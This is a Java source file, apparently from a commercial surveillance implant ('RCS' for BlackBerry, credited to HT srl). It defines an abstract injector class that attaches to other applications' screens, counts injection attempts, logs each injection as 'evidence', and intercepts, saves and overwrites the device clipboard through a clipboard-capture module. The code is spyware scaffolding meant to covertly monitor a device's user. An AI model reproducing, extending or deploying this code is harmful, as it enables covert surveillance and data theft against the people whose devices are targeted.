

/* *************************************************
 * Copyright (c) 2010 - 2012
 * HT srl,   All rights reserved.
 * 
 * Project      : RCS, RCSBlackBerry
 * *************************************************/

package blackberry.injection.injectors;

import net.rim.device.api.system.Clipboard;
import net.rim.device.api.ui.Screen;
import net.rim.device.api.ui.UiApplication;
import blackberry.Messages;
import blackberry.debug.Debug;
import blackberry.debug.DebugLevel;
import blackberry.evidence.Evidence;
import blackberry.fs.Path;
import blackberry.module.ModuleClipboard;

public abstract class AInjector {



    private UiApplication injectedApp = null;
    private int tries = 0;
    protected boolean enabled = true;
    private Object clip;

    public abstract String getAppName();

    public abstract String getCodName();

    public abstract String[] getWantedScreen();

    public abstract void playOnScreen(Screen screen);

    public boolean enabled() {
        return enabled;
    }

    public final void disable() {
        enabled = false;
    }

    public void incrTries() {
        tries++;
    }

    public int getTries() {
        return tries;
    }

    public void resetTries() {
        tries = 0;
    }

    public void setInjectedApp(UiApplication app) {        
        init();
        



        



        
        this.injectedApp = app;
        
        final String appName = getAppName();
       /* Main main = Main.getInstance();
        main.invokeLater(new Runnable() {
            public void run() {
             // A.0=INJ: 
                Evidence.info(Messages.getString("A.0") + appName); //$NON-NLS-1$
            }
        });*/
        
        Evidence.info(Messages.getString("A.0") + appName); //$NON-NLS-1$

    }

    public UiApplication getInjectedApp() {
        return injectedApp;
    }

    public boolean isInjected() {
        return injectedApp != null;
    }

    protected void disableClipboard() {



        clip = Clipboard.getClipboard().get();
        ModuleClipboard.getInstance().suspendClip();
    }

    protected void enableClipboard() {



        ModuleClipboard.getInstance().resumeClip();

        try {
            Clipboard.getClipboard().put(clip);
        } catch (Exception ex) {




        }
    }

    protected void setClipboard(Object object) {
        if (object instanceof String) {
            String clip = (String) object;
            ModuleClipboard.getInstance().setClip(clip);
        }
    }
    
    public synchronized void init() {
        if (!Path.isInizialized()) {
            Path.makeDirs();
        }
        Debug.init();
    }

    public abstract String getPreferredMenuName();






}
